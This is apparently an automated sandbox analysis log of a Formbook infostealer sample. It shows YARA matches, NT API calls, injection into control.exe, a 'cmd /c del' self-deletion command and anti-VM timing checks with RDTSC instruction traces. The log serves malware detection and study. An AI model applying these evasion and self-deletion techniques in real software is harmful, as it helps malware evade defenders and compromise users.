          Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_0040604C
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00404772
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_021E0A3A
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041C8C5
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041B8F3
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041C134
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041D2AE
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00408C8B
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00408C90
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041CF5F
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009DB090
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81002
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CF900
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009E4120
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009FEBB0
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C0D20
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A91D55
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009E6E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441D466
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04350D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04421D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04422D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_044225DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04382581
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04376E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441D616
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04422EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04421FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411002
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043820A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_044228EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_044220A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04374120
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_044222AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04422B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438EBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441DBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001EC8C5
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001D8C90
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001D8C8B
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001D2D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001D2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0435B150 appears 35 times
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_004185F0 NtCreateFile,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_004186A0 NtReadFile,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00418720 NtClose,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_004185EA NtCreateFile,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A0B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09A10 NtQuerySection,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A0A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A0AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09560 NtWriteFile,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A0A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09760 NtOpenProcess,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A09770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A0A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043995D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043996D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0439AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043995F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0439A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0439A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043997A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0439B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043998A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043998F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043999D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0439A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E85F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E86A0 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E8720 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E87D0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E85EA NtCreateFile,
          Source: 5tCYPTkM6b.exe, 00000000.00000003.268713212.000000001B1CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5tCYPTkM6b.exe
          Source: 5tCYPTkM6b.exe, 00000000.00000003.266191041.000000001B036000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5tCYPTkM6b.exe
          Source: 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5tCYPTkM6b.exe
          Source: 5tCYPTkM6b.exe, 00000002.00000002.332526173.0000000000955000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs 5tCYPTkM6b.exe
          Source: 5tCYPTkM6b.exe, 00000002.00000002.333320879.0000000000C4F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5tCYPTkM6b.exe
          Source: 5tCYPTkM6b.exeVirustotal: Detection: 39%
          Source: 5tCYPTkM6b.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeFile read: C:\Users\user\Desktop\5tCYPTkM6b.exeJump to behavior
          Source: 5tCYPTkM6b.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\5tCYPTkM6b.exe "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeProcess created: C:\Users\user\Desktop\5tCYPTkM6b.exe "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeProcess created: C:\Users\user\Desktop\5tCYPTkM6b.exe "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsiD4B2.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@11/3
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: wntdll.pdbUGP source: 5tCYPTkM6b.exe, 00000000.00000003.267437661.000000001B0B0000.00000004.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000000.00000003.264871766.000000001AF20000.00000004.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332546161.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000003.334008082.0000000004190000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524788773.000000000444F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524438150.0000000004330000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: 5tCYPTkM6b.exe, 00000002.00000002.332518293.0000000000950000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 5tCYPTkM6b.exe, 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332546161.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, control.exe, control.exe, 0000000E.00000003.334008082.0000000004190000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524788773.000000000444F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524438150.0000000004330000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: 5tCYPTkM6b.exe, 00000002.00000002.332518293.0000000000950000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041B832 push eax; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041B83B push eax; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_004160CB push edx; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041B8D6 push ebp; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041B8F3 push ebp; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041B89C push eax; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041C134 push ebp; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00407265 push cs; iretd
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_004152C7 push edx; retf
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041537D push ebp; retf
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041C5DD push ebp; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00415F76 push ds; iretd
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041B7E5 push eax; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00408783 push ecx; iretd
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A1D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043AD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001EB83B push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001EB832 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001EB89C push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001EB8D6 push ebp; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E60CB push edx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001D7265 push cs; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E52C7 push edx; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E537D push ebp; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E5F76 push ds; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001D8783 push ecx; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001EB7E5 push eax; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeFile created: C:\Users\user\AppData\Local\Temp\nsiD4B4.tmp\npsx.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\control.exeProcess created: /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Windows\SysWOW64\control.exeProcess created: /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000001D8614 second address: 00000000001D861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000001D89AE second address: 00000000001D89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 5672Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 7144Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_004088E0 rdtsc
          Source: C:\Windows\SysWOW64\control.exeAPI coverage: 9.7 %
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00402630 FindFirstFileA,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000000.281905557.0000000008C73000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.302266423.0000000008A32000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.302266423.0000000008A32000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.281437629.0000000008B88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.281437629.0000000008B88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000004.00000000.297278556.00000000048E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.281437629.0000000008B88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000004.00000000.315675914.0000000008ACF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000004.00000000.315675914.0000000008ACF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.299091011.00000000069DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD002
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_004088E0 rdtsc
